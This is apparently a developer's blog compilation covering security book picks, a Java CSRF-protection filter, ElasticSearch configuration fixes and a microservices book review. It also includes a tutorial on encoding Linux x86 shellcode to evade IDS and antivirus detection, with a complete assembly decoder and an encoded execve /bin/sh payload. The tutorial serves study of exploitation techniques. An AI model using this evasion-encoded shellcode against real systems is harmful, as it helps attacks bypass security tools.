5 (software) security books that every (software) developer should read

I must admit that the title is a little bit catchy; a better title would have been “5 software security books that every developer should be aware of“. Depending on your interest you might want to read entirely these books or you could just know that they exists. There must be tons of software security books on the market but this is my short list of books about software security that I think that each developer that is interested in software security should be aware of.

Hacking – the art of exploitation This book explains the basics of different hacking techniques, especially the non-web hacking techniques: how to find vulnerabilities (and defend against)  like buffer overflow or stack-based buffer overflow , how to write shellcodes, some basic concepts on cryptography and attacks linked to the cryptography like the man-in-the-middle attack of an SSL connection. The author tried to make the text easy for non-technical peoples but some programming experience is required (ideally C/C++) in order to get the best of this book. You can see my full review of the book here.

Iron-Clad Java: Building secure web applications This book presents the hacking techniques and the countermeasures for the web applications; you can see this books as complementary of the previous one; the first one contains the non-web hacking techniques, this one contains (only) web hacking techniques; XSS, CSRF, how to protect data at rest, SQL injection and other types of injections attacks. In order to get the most of the book some Java knowledge is required. You can see my full review of the book here.

Software Security-Building security in  This books explains how to introduce the security into the SDLC; how to introduce abuse cases and security requirements in the requirements phase, how to introduce risk analysis (also known as Threat Modeling) in the design phase and software qualification phase. I really think that each software developer should at least read the first chapter of the book where the authors explains why the old way of securing application (seeing the software applications as “black boxes” than can be protected using firewalls and IDS/IPS) it cannot work anymore in the today software landscape. You can see my full review of the book here: Part 1, Part 2 and Part 3.

The Tangled Web: A Guide to Securing Modern Web Applications This is another technical book about security on which you will not see a single line of code (the Software Security-Building security in is another one) but it highly instructive especially if you are a web developer. The book presents all the “bricks” of the today Internet: HTTP, WWW, HTML, Cookies, Scripting languages, how these bricks are implemented in different browsers and especially how the browsers are implementing the security mechanism against rogue applications. You can see my full review of the book here.

Threat modeling – designing for security Threat modeling techniques (also known as Architectural Risk Analysis) were around for some time but what it has changed in the last years is the accessibility of these technique for the software developers.  This book is one of the reasons for which the threat modeling is accessible to the developers. The book is very dense but it  suppose that you have no knowledge about the subject. If you are interested in the threat modeling topic you can check this ticket: threat modeling for mere mortals.

A Java implementation of CSRF mitigation using “double submit cookie” pattern

Goal of this articlecsrf

The goal of this article is to present an implementation of the “double submit cookie” pattern used to mitigate the Cross Site Request Forgery (CSRF) attacks. The proposed implementation is a Java filter plus a few auxiliary classes and it is (obviously) suitable for projects using the Java language as back-end technology.

Definition of CSRF and possible mitigations

In the case of a CSRF attack, the browser is tricked into making unauthorized requests on the victim’s behalf, without the victim’s knowledge. The general attack scenario contains the following steps:

  1. the victim connects to the vulnerable web-site, so it have a real, authenticated session.
  2. the hacker force the victim (usually using a spam/fishing email) to navigate to another (evil) web-site containing the CSRF attack.
  3. when the victim browser execute the (evil) web-site page, the browser will execute a (fraudulent) request to the vulnerable web-site using the user authenticated session. The user is not aware at all of the fact that navigating on the (evil) web-site will trigger an action on the vulnerable web-site.

For deeper explanations I strongly recommend  to read chapter 5 of Iron-Clad Java: Building Secure Applications book and/or the OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet.

Definition of “double submit cookie” pattern

When a user authenticates to a site, the site should generate a (cryptographically strong) pseudo-random value and set it as a cookie on the user’s machine separate from the session id. The server does not have to save this value in any way, that’s why this patterns is sometimes also called Stateless CSRF Defense.

The site then requires that every transaction request include this random value as a hidden form value (or other request parameter). A cross origin attacker cannot read any data sent from the server or modify cookie values, per the same-origin policy.

In the case of this mitigation technique the job of the client is very simple; just retrieve the CSRF cookie from the response and add it into a special header to all the requests:

csrfclient

Client workflow

The job of the server is a little more complex; create the CSRF cookie and for each request asking for a protected resource, check that the CSRF cookie and the CSRF header of the request are matching:

csrfserver

Server workflow

Note that some JavaScript frameworks like AngularJS implements the client worflow out of the box; see Cross Site Request Forgery (XSRF) Protection

Java implementation of “double submit cookie” pattern

The proposed implementation is on the form of a (Java) Servlet filter and can be found here: GenericCSRFFilter GitHub.

In order to use the filter, you must define it into you web.xml file:

<filter>
   <filter-name>CSRFFilter</filter-name>
   <filter-class>com.github.adriancitu.csrf.GenericCSRFStatelessFilter</filter-class>
<filter>

<filter-mapping>
   <filter-name>CSRFFilter</filter-name>
   <url-pattern>/*</url-pattern>
</filter-mapping>

 

The filter can have 2 optional initialization parameters: csrfCookieName representing the name of the cookie that will store the CSRF token and csrfHeaderName representing the name of the HTTP header that will be also contains the CSRF token.

The default values for these parameters are “XSRF-TOKEN” for the csrfCookieName and “X-XSRF-TOKEN” for the csrhHeaderName, both of them being the default values that AngularJS is expecting to have in order to implement the CSRF protection.

By default the filter have the following features:

  • works with AngularJS.
  • the CSRF token will be a random UUID.
  • all the resources that are NOT accessed through a GET request method will be CSRF protected.
  • the CSRF cookie is replaced after each non GET request method.

How it’s working under the hood

The most of the functionality is in the GenericCSRFStatelessFilter#doFilter method; here is the sequence diagram that explains what’s happening in this method:

doFilter method sequence diagram

doFilter method sequence diagram

The doFilter method is executed on each HTTP request:

  1. The filter creates an instance of ExecutionContext class; this class is a simple POJO containing the initial HTTP request, the HTTP response, the CSRF cookies (if more than one cookie with the csrfCookieName is present) and implementation of the ResourceCheckerHook , TokenBuilderHook and ResponseBuilderHook .(see the next section for the meaning of this classes).
  2. The filter check the status of the HTTP resource, that status can be:MUST_NOT_BE_PROTECTED, MUST_BE_PROTECTED_BUT_NO_COOKIE_ATTACHED,MUST_BE_PROTECTED_AND_COOKIE_ATTACHED (see ResourceStatus enum) using an instance of ResourceCheckerHook.
  3. If the resource status is ResourceStatus#MUST_NOT_BE_PROTECTED
    ResourceStatus#MUST_BE_PROTECTED_BUT_NO_COOKIE_ATTACHED then
    the filter creates a CSRF cookie having as token the token generated by an instance of TokenBuilderHook.
  4. if the resource status ResourceStatus#MUST_BE_PROTECTED_AND_COOKIE_ATTACHED
    then compute the CSRFStatus of the resource and then use an instance of ResponseBuilderHook to return the response to the client.

How to extend the default behavior

It is possible to extend or overwrite the default behavior by implementing the hooks interfaces. All the hooks implementations must be thread safe.

  1. The ResourceCheckerHook is used to check the status of a requested resource. The default implementation is DefaultResourceCheckerHookImpl and it will return ResourceStatus#MUST_NOT_BE_PROTECTED for any HTTP GET method, for all the other request types, it will return [email protected] ResourceStatus#MUST_BE_PROTECTED_BUT_NO_COOKIE_ATTACHED if any CSRF cookie is present in the query or ResourceStatus#MUST_BE_PROTECTED_BUT_NO_COOKIE_ATTACHED otherwise.The interface signature is the following one:
    public interface ResourceCheckerHook extends Closeable {
        ResourceStatus checkResourceStatus(ExecutionContext executionContext);
    }  
  2. The TokenBuilderHook hook is used to generate the token that will be used to create the CSRF cookie. The default implementation  is DefaultTokenBuilderHookImpl and it uses a call to UUID.randomUUID to fetch a token. The interface signature is the following one:
    public interface TokenBuilderHook extends Closeable {
        String buildToken(ExecutionContext executionContext);
    }
  3. The ResponseBuilderHook is used to generate the response to the client depending of the CSRFStatus of the resource. The default implementation is DefaultResponseBuilderHookImpl and it throws a SecurityException if the CSRF status is CSRFStatus#COOKIE_NOT_PRESENT, CSRFStatus#HEADER_TOKEN_NOT_PRESENT or CSRFStatus#COOKIE_TOKEN_AND_HEADER_TOKEN_MISMATCH. If the CSRF status is CSRFStatus#COOKIE_TOKEN_AND_HEADER_TOKEN_MATCH then the old CSRF cookies are deleted and a new CSRF cookie is created. The interface signature is the following one:
    public interface ResponseBuilderHook extends Closeable {
        ServletResponse buildResponse(ExecutionContext executionContext,
                                      CSRFStatus status);
    }
    

The hooks are instantiated inside the GenericCSRFStatelessFilter#init method using the ServiceLoader Java 6 loading facility. So if you want to use your implementation of one of the hooks then you have to create a  META-INF/services directory that contains a text file whose name matches the fully-qualified interface class name of the hook that you want to replace.

Here is the sequence diagram representing the hooks initializations:

initmethod

ElasticSearch:How to enable scripting on the embedded server

The goalelastic

In this ticket I will present all the required steps in order to enable the scripting on an embedded elasticsearch server. I will not explain how to create and use an embedded server but if you need more infos you can read this ticket Embedded Elasticsearch Server for Tests.

If you execute a script within the embedded server the following exception will be thrown;

Caused by: java.lang.IllegalArgumentException: script_lang not supported [xxxxx]
    at  org.elasticsearch.script.ScriptService.getScriptEngineServiceForLang(ScriptService.java:211)

 Code changes

 The easiest way to create an embedded server is the following one:

 Node node = NodeBuilder.nodeBuilder()
              .local (true)
              .settings(
               //add settings here
               )
              .node ();

The problem with this approach is that the NodeBuilder.node() method it will create a node class with an empty list of plug-ins; see the NodeBuilder.node code:

   /*
    * Builds the node without starting it.
    */
    public Node build() {
        return new Node(settings.build());
    }
    //Node(Settings) constructor
     /**
     * Constructs a node with the given settings.
     *
     * @param preparedSettings Base settings to configure the node with
     */
     public Node(Settings preparedSettings) {
        this(InternalSettingsPreparer
                .prepareEnvironment(preparedSettings, null),
             Version.CURRENT,
             Collections.<Class<? extends Plugin>>emptyList());
     }

In order to create a node having a list of desired plug-ins the second constructor of the Node class should be used:

protected Node(
                Environment tmpEnv, 
                Version version, 
                Collection<Class<? extends Plugin>> classpathPlugins)

The problem with this (second) constructor is that it is protected so we will need to extend the Node class to be able to use the protected constructor and we will need to extend also the NodeBuilder class in order to use the new Node class.

And here is the code:

  //PluginNode class 
  private static class PluginNode extends Node {
      public PluginNode(Settings preparedSettings, List<Class<? extends Plugin>> plugins) {
         super(InternalSettingsPreparer.prepareEnvironment(preparedSettings, null), Version.CURRENT, plugins);
      }
  }

  //PluginNodeBuilder class
  public class PluginNodeBuilder extends NodeBuilder {
        private List<Class<? extends Plugin>> plugins = new ArrayList<>();
        
        public PluginNodeBuilder() {
            super();
        }
        //new method to add plug-ins       
        public PluginNodeBuilder addPlugin(Class<? extends Plugin> plugin) {
            plugins.add(plugin);
            return this;
        }

        @Override
        //use the new PluginNode to build a node 
        public Node build() {
            return new PluginNode(settings().build(), plugins);
        }
    };

And how to use the new node builder:

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local (true)
                .settings(
                 //add settings here
                 )
                .node ();

Enable scripting feature

Using the previous Java code it will not be sufficient to execute the scripts; you must also use the right settings at the server creation and add the (Maven) dependencies to your classpath.

Server settings

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local (true)
                .settings (Settings.settingsBuilder ()
                     ...
                     //this is common for all languages
                     .put ("script.inline", true)
                     //this are the settings for the groovy language
                     .put ("script.engine.groovy.inline.mapping", true)
                     .put ("script.engine.groovy.inline.search", true)
                     .put ("script.engine.groovy.inline.update", true)
                     .put ("script.engine.groovy.inline.plugin", true)
                     .put ("script.engine.groovy.inline.aggs", true)
                      
                     //this are the settings for the expression language
                     .put ("script.engine.expression.inline.mapping", true)
                     .put ("script.engine.expression.inline.search", true)
                     .put ("script.engine.expression.inline.update", true)
                     .put ("script.engine.expression.inline.plugin", true)
                     .put ("script.engine.expression.inline.aggs", true)

If you more details about all the possible settings options you can look to the ElasticSearch Scripting documentation.

Maven dependencies

For the expression language:

       <dependency>
            <groupId>org.apache.lucene</groupId>
            <artifactId>lucene-expressions</artifactId>
            <version>5.5.2</version>
            <scope>compile</scope>
        </dependency>

       <dependency>
            <groupId>org.elasticsearch.module</groupId>
            <artifactId>lang-expression</artifactId>
            <version>2.2.0</version>
            <scope>compile</scope>
        </dependency>

For the groovy language:

<dependency>
    <groupId>org.elasticsearch.module</groupId>
    <artifactId>lang-groovy</artifactId>
    <version>2.3.2</version>
</dependency>

ElasticSearch:How to programmatically update settings of an existing index

The goal of this ticket is to show how to update programmatically the settings of anelastic ElasticSeach index. I will take as example the ElaticSeachsynonyms. Imagine that for a specific index, you have the following synonyms settings:

 "analysis": {
      "filter": {
        "synonym_filter": {
          "type": "synonym",
          "ignore_case": true,
          "synonyms": [
            "Romania, RO",
            "Belgium, BE"
          ]
        }
      },
....

Now, imagine (also) that you want to add a new entry into the synonyms lists (“France, FR”). You could do this by using the ElasticSearch  REST interface (please go here if you want to know more Elasticsearch: updating the mappings and settings of an existing index) or you can use the Java API offered by ElasticSearch to do the same task programmatically:

//close the index before the update
client.admin().indices().close(new CloseIndexRequest(indexName));

//update the synonyms
client.admin().indices().prepareUpdateSettings(indexName).setSettings(
             Settings.builder()
                .put(
                        //setting prefix
                        "index.analysis.filter.synonym_filter",
                        //group name
                        "synonyms",
                        //settings
                        new String[] {"0", "1", "2"},
                        //values
                        new String []{
                                 "Romania,RO", 
                                 "Belgium,BE", 
                                 "France,FR"
                                      }
                       )
            ).get();

//open the index
client.admin().indices().open(new OpenIndexRequest(indexName));

 

Useful links:

ElasticSearch Doc – Update Indices Settings

(Unofficial) ElasticSearch Java API for the IndicesAdminClieant interface

(Unofficial) ElasticSearch Java API for the ImmutableSettings.Builder.put method

 

 

Book review: Building microservices (part 1)

This is the first part of the review of the Building Microservices book.

Chapter 1: Microservicesmicroservices

This first chapter is a quick introduction to microservices, the definition, the concept genesis and the key benefits. The microservices idea have emerged from the (new) ways of crafting software today, this new ways implies the use domain-driven design, the continuous delivery, the virtualization, the infrastructure automation and the small autonomous teams.

The author is defining the microservices as “small, autonomous services that work together”.

The key benefits of the microservices are:

  • technology heterogeneity; use the right tool for the right job.
  • resilience; because the microservices have service boundaries quite well defined the failures are not cascading, it’s easy to quick find and isolate the problem(s).
  • scaling; the microservices can be deployed and run independently, so it is possible to choose which microservices need special attention to be scaled accordingly.
  • ease of deployment; microservices are independent by nature so, it can be (re)deployed punctually.
  • optimizing for replaceability; due to autonomous characteristics, the microservices can be easily replaced with new versions.

Chapter 2: The Evolutionary Architect

This chapter is about the role of the architect in the new IT landscape; for the author the qualities of an IT architect a re the following ones: should have a vision and be able to communicate it very clearly, should have empathy so he could understand the impact of his decisions over the colleagues and customers, should be able to collaborate with the others in order to define and execute the vision,  should be adaptable so he can change the vision as the changing of requirements, should be autonomous so he could find the right balance between standardizing and enabling autonomy for the team.

For me this chapter it does not feet very well in the book because all the ideas (from the chapter) could very well be applied to monolithic systems also.

Chapter 3: How to model services

The goal of this chapter is to split the services in the right way by finding the boundaries between services. In order to find the right service boundaries, it must see the problem from the model point of view.

The author introduces the notion of bounded context, notion that was coined by Eric Evans’s in Domain-Driven Design book. Any domain consists of multiple bounded contexts, and residing within each are components that do not need to be communicated outside as well as things that should be shared externally with other bounded contexts. By thinking in terms of model, it is possible to avoid the tight coupling pitfall. So, the each bounded context represents an ideal candidate for a microservice.

This cut on the bounded context is rather a vertical slice but in some situation due to technical boundaries, the cut can be done horizontally.

Chapter 4: Integration

All the ideas of this chapter are around 3 axes; inter-microservices integration, user interface integration with microservices and the COTS (Commercial Off the Shelf Software) integration with microservices.

For the inter-microservices integration different communications styles (synchronous versus asynchronous), different ways to manage (complex) business processes (orchestration versus choreography) and technologies (RPC, SOAP, REST) are very carefully explained with all the advantages and drawbacks. The author tend to prefer the asynchronous-choreographic using REST style, but he emphases that there is no ideal solution.

Then some integration issues are tackled; the service versioning problem or how to (wisely) reuse the code between microservices and/or client libraries and no fit all solution is proposed, just different options.

For the user interface integration with microservices some interesting ideas are presented, like the creation of a different backend api if your microservices are used by different ui technologies (create a backend api for the mobile application and a different backend api for the web application). Another interesting idea is to have services directly serving up UI components.

 The integration of microservices and the COTS part is around the problems that a team should solve in order to integrate with COTS; lack of control (the COTS could use a different technological stack that your microservices), difficult customization of COTS.

Chapter 5: Splitting the Monolith

The goal of this chapter is to presents some ideas about how to split a monolithic application into microservices. The first proposed step is to find portions of the code that can be treated in isolation and worked on without impacting the rest of the codebase (this portions of code are called seams, this word have been coined by Michael Feather in Working Effectively with Legacy Code). The seams are the perfect candidates for the service boundaries.

In order to easily refactor the code to create the seams the authors is advertising the Structure101 application which is an ADE (Architecture Development Environment); for alternatives to Structure 101 you can see Architecture Development Environment: Top 5 Alternatives to Structure101

 The rest of the chapter is about how to find seams in the database and into the code that is using it. The overall idea is that every microservice should have his own independent (DB) schema. Different problems will raise if this happens like the foreign key relationship problem, share of static data stored in the DB, shared tables, the transactional boundaries. Each of this problem is discussed in detail and multiple solutions are presented.

The author recognize that splitting the monolith it’s not trivial at all and it should start very small (for the DB for example a first step would be to split the schema and keep the code as it was before, the second step would be to migrate some parts of the monolithic code towards microservices). It also recognize that sometimes the splitting brings new problems (like the transactional boundaries).

Chapter 6: Deployment

This chapter presents different deployment techniques for the micro services. The first topic that is tackled is how the micro services code should be stored and how the Continuous Integration (CI) process should work; multiple options are discussed: one code repository for all micro services, and one CI server; one code repository by micro service and one CI server, build pipelines by operating system or by directly platform artifacts.

A second topic around the deployment is about the infrastructure on which the micro services are deployed. Multiple deployment scenarios are presented: all micro services deployed on same host, one micro service by host, virtualized hosts, dockerized hosts. The most important idea on this part is that all the deployment and the host creation should be automate; the automation is essential for keeping the team/s productive.

 

 

How to write a (Linux x86) custom encoded shellcode

Goal

Very often the shellcode authors will try to obfuscate the shellcode in order to bypass the ids/ips or the anti-viruses. This kind of shellcode is often call an “encoded shellcode”.  The goal of this ticket is to propose an (rather simple) encoding schema and the decoding part written in assembler.

What is an encoded shellcode

An encoded shellcode is a shellcode that have the payload encoded in order to escape the signature based detection. To work correctly the shellcode must initially decode the payload and then execute it. For a very basic example you can check the A Poor Man’s Shellcode Encoder / Decoder video.

(My) custom encoder

The encoding schema that I propose is the following one:

  • the payload is split in different blocks of random size between 1 and 9 bytes.
  • the first octet of each block represents the size of the original block.
  • the last character of the last block is a special character represented a terminal (0xff).

Supposing that the payload is something like:

0xaa,0xbb,0xcc,0xdd,0xee

One possible encoding version could be:

0x02,0xaa,0xbb,0x01,0xcc,0x03,0xdd,0xee,0xff

or

0x04,0xaa,0xbb,0xcc,0xdd,0x02,0xee,0xff

or

0x09,0xaa,0xbb,0xcc,0xdd,0xee,0xff

If you want to play with this encoding schema you can use the Random-Insertion-Encoder.py program that will write to the console the encoded shellcode for a specific shellcode.

(My) custom decoder

So, initially the payload will be encoded (with the custom shema) and when the shellcode is executed, in order to have a valid payload, the decoder should be executed. The decoder will decode the payload and then pass the execution to the payload.

The first problem that the decoder should solve is to find the memory address of the encoded payload. In order to do this, we will use the “Jump Call Pop” mechanism explained in the Introduction to Linux shellcode writing (Part 2) (paragraph 5.1 ).

The  skeleton of the decoder will look like:

global _start 
section .text
_start:
 jmp short call_shellcode
decoder:
 ; the top of the stack contains the
 ; address of the EncodedShelcode
 
 ; decoder code
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,.........,0xff

 A few words before showing you the code of the decoder. The decoder basically moves bytes from the right toward the left and skip the first byte of each block until the terminal byte is found. For the move of the bytes the lodsb and stosb instructions are used. These instructions are using the ESI (lodsb) and EDI (stosb) registers, so you can see ESI as a source register and EDI as a destination register.

The DL register is used as block bytes counter and the CL register contains the content of the first byte of each block. So, in order to know if all the bytes of a block had been copied a comparison between DL and CL is done.

A special care should be take before the ESI register is incremented; either manually or automatically by the lodsb instruction. A check should be done if the ESI points to the terminator byte and stop the copy otherwise the decoder will try to read memory locations that do not have access (and the program will stop with a core dumped exception).

So, here is the code of the decoder:

global _start 
section .text
_start:
 jmp short call_shellcode

decoder:
 ;get the adress of the shellcode
 pop esi

 ;allign edi and esi
 lea edi, [esi]

handle_next_block:
 ;check that the esi do not point
 ;to the terminator byte
 xor ecx,ecx
 mov cl, byte[esi]
 mov bl , cl
 xor bl, 0xff

 ;if esi points to terminator byte
 ;then execute the shellcode
 jz short EncodedShellcode

 ;otherwise then ship next byte
 ;because it's the first byte
 ;of the block and it contains
 ;the number of bytes that
 ;the block contains.
 inc esi
 
 ;dl it is used to count the
 ;number of bytes from a block
 ;already copied
 xor edx, edx
 
handle_next_byte:
 ;check that the esi do not point
 ;to the terminator byte
 mov bl, [esi]
 xor bl, 0xff
 
 ;if esi points toterminator byte
 ;then execute the shellcode
 jz short EncodedShellcode
 
 ;otherwise copy the byte pointed by
 ;esi to the location pointed by edi;
 ;esi is automatically incremented by
 ;the lodsb and edi by stosb
 lodsb
 stosb
 
 ;one more byte of the block had been copied
 ;so increment the counter
 inc dl
 
 ;check that all the bytes of the block
 ;have been copied;
 ;cl contains the first byte of the block
 ;representing the number of bytes of the
 ;block and dl contains the number of
 ;block bytes already copied
 cmp cl, dl
 
 ;if not zero then not all the block bytes
 ;have been copied
 jnz handle_next_byte
 
 ;otherwise go to the next block
 jmp handle_next_block
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,0x31,0xc0,0x50,0x68,0x2f,0x2f,0x09,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x01,0x50,0x07,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0x01,0xcd,0x09,0x80,0xff

How to test the shellcode

In order to test the shellcode you must follow the next steps:

All the source codes presented in this ticket can be found here: gitHub.

Bibliography

How to fix ElasticSearch client exception “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_”

This ticket explains a possible solution  for the “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_” exception when a Java ElasticSearch client tries to connect to a (ElasticSearch) cluster using Shield.

Environment

ElasticSearch version: 1.7.3

Shield version: 1.3.3

Context

The way to connect a Java ElasticSearch client to a cluster using Shield is quite straightforward; you can see the ElasticSearch documentation. The most important part (at least in the context of this problem) is the creation of the Settings instance:

Settings settings = ImmutableSettings.settingsBuilder()
                .put("cluster.name", clusterName)
                .put("shield.ssl.keystore.path", jksPath)
                .put("shield.ssl.keystore.password", jksPassword)
                .put("shield.transport.ssl", "true")
                .put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")
                .build();
......

When the client is executed, the following strange stacktrace is thrown:

Full stacktrace

1) A binding to org.elasticsearch.shield.transport.filter.IPFilter was already configured at _unknown_.
  at _unknown_
2) A binding to org.elasticsearch.shield.transport.ClientTransportFilter was already configured at _unknown_.
  at _unknown_
3) A binding to org.elasticsearch.shield.ssl.ClientSSLService was already configured at _unknown_.
  at _unknown_
4) A binding to org.elasticsearch.shield.ssl.ServerSSLService was already configured at _unknown_.
  at _unknown_
4 errors
       at org.elasticsearch.common.inject.internal.Errors.throwCreationExceptionIfErrorsExist(Errors.java:344)
       at org.elasticsearch.common.inject.InjectorBuilder.initializeStatically(InjectorBuilder.java:151)
       at org.elasticsearch.common.inject.InjectorBuilder.build(InjectorBuilder.java:102)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:93)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:70)
       at org.elasticsearch.common.inject.ModulesBuilder.createInjector(ModulesBuilder.java:59)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:195)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:125)

 

Root cause

The root cause of this problem is the line:

.put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")

If this line is removed then the problem is solved. This property should be exclusively used with the 2.0 version of Shield and not with  1.3.3 version.

The moral of this story ? First of all you should use the right version of the ElaticSearch documentation (in my case I was running the 1.7.3  version but I used the documentation for the 2.o). The second point is  that ElasticSearch API is not very user friendly (I even dare to say that is badly designed). I would preferred that ImmutableSettings.Builder class to have a put method with a Java enum as first parameter not a Java String.